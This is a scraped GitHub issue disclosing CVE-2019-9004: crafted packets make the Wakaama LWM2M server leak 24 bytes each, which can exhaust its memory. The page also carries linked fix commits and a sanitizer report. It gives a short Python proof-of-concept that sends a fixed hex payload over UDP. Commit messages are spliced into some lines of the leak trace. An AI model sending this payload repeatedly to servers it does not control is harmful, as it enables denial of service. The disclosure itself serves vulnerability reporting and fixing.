Memory leak while processing crafted packet #425
Comments
sbertin-telular
added a commit
to sbertin-telular/wakaama
that referenced
this issue
Feb 18, 2019
Option processing can allocate memory. Encountering a bad option was returning and error without freeing that memory. This adds the necessary calls to free the memory to fix eclipse-wakaama#425. Signed-off-by: Scott Bertin <sbertin@telular.com>
|
For this vulnerability following ID was assigned: CVE-2019-9004 |
gerrit-swi
pushed a commit
to legatoproject/wakaama
that referenced
this issue
Jul 16, 2020
Merge the Wakaama eclipse-wakaama#425 and add unitary test Fix another leak Resolves: LE-15018 Relates: LE-14808 Change-Id: I5db3bea45429f66aaacb83425d5915fe0c94331f Signed-off-by: Frederic DUR <fdur@sierrawireless.com>
gerrit-swi
pushed a commit
to legatoproject/wakaama
that referenced
this issue
Aug 6, 2020
Merge the Wakaama eclipse-wakaama#425 and add unitary test Fix another leak Resolves: LE-15016 Change-Id: Ib1e6cf39aeaa663d4d7e3601135311a0aa48e536 Signed-off-by: Frederic DUR <fdur@sierrawireless.com>
gerrit-swi
pushed a commit
to legatoproject/wakaama
that referenced
this issue
Feb 24, 2021
Merge the Wakaama eclipse-wakaama#425 and add unitary test Fix another leak Relates: LE-14808 Resolves: LE-15890 Change-Id: I19bb39afb0481d36e9f12ac2a86cbaccfd474545 Signed-off-by: Frederic DUR <fdur@sierrawireless.com> (cherry picked from commit b1f3a8beec3e0cbaddc28a51cdd24097272ac899)
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Wakaama LWM2M server incorrectly handles incoming packets leading to a memory leak.
Processing of the single crafted packet leads to leaking (wasting) 24 bytes of memory.
This can lead to stopping of the LWM2M server after exhausting all available memory.
Depending on server configuration and isolation of services, this can stop also other processes on the same server.
Proposed CVSS 3.0 Score:
On systems with modern memory protection and isolation of services:
5.3 (medium) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
On systems with lower memory protection and no isolation of services:
7.5 (high) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Reproduction:
Wakaama must be compiled with Leak Sanitizer (or other similar tool) by setting compilation flag:
C_FLAGS = -fsanitize=address
Run Wakaama server as:
lwm2mserver -4 -l 55555
Run following Python2 script (running multiple times will show larger leak):
import sys
import socket
WAKAAMA_PAYLOAD = "4402e6e2e2e68167b2726411"
out_data = WAKAAMA_PAYLOAD.decode('hex')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM )
s.sendto(out_data, (sys.argv[1], int(sys.argv[2])))
Execution of the script:
python2 wakaama_test.py dst_ip dst_port
(where: dst_ip and dst_port are IP and port of tested Wakaama server)
e.g.:
sudo python wakaama_test.py 192.168.0.101 55555
Close the lwm2mserver to get report from Leak Sanitizer:
Direct leak of 24 byte(s) in 1 object(s) allocated from:
#0 0x7f4fa293b602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
Generate random message id. #1 0x42f1df in lwm2m_malloc (/wakaama-master/build_asan/lwm2mserver+0x42f1df)
send token on error message. #2 0x425ad6 in coap_add_multi_option (/wakaama-master/build_asan/lwm2mserver+0x425ad6)
do not use coap_get_mid. #3 0x42910f in coap_parse_message (/wakaama-master/build_asan/lwm2mserver+0x42910f)
Add command line parameters for specifying local port, remote host and r... #4 0x412aac in lwm2m_handle_packet (/wakaama-master/build_asan/lwm2mserver+0x412aac)
Execute may return a value in the response #5 0x4088e2 in main (/wakaama-master/build_asan/lwm2mserver+0x4088e2)
allow write tlv instance + bug fix #6 0x7f4fa24f982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
SUMMARY: AddressSanitizer: 24 byte(s) leaked in 1 allocation(s).
The text was updated successfully, but these errors were encountered: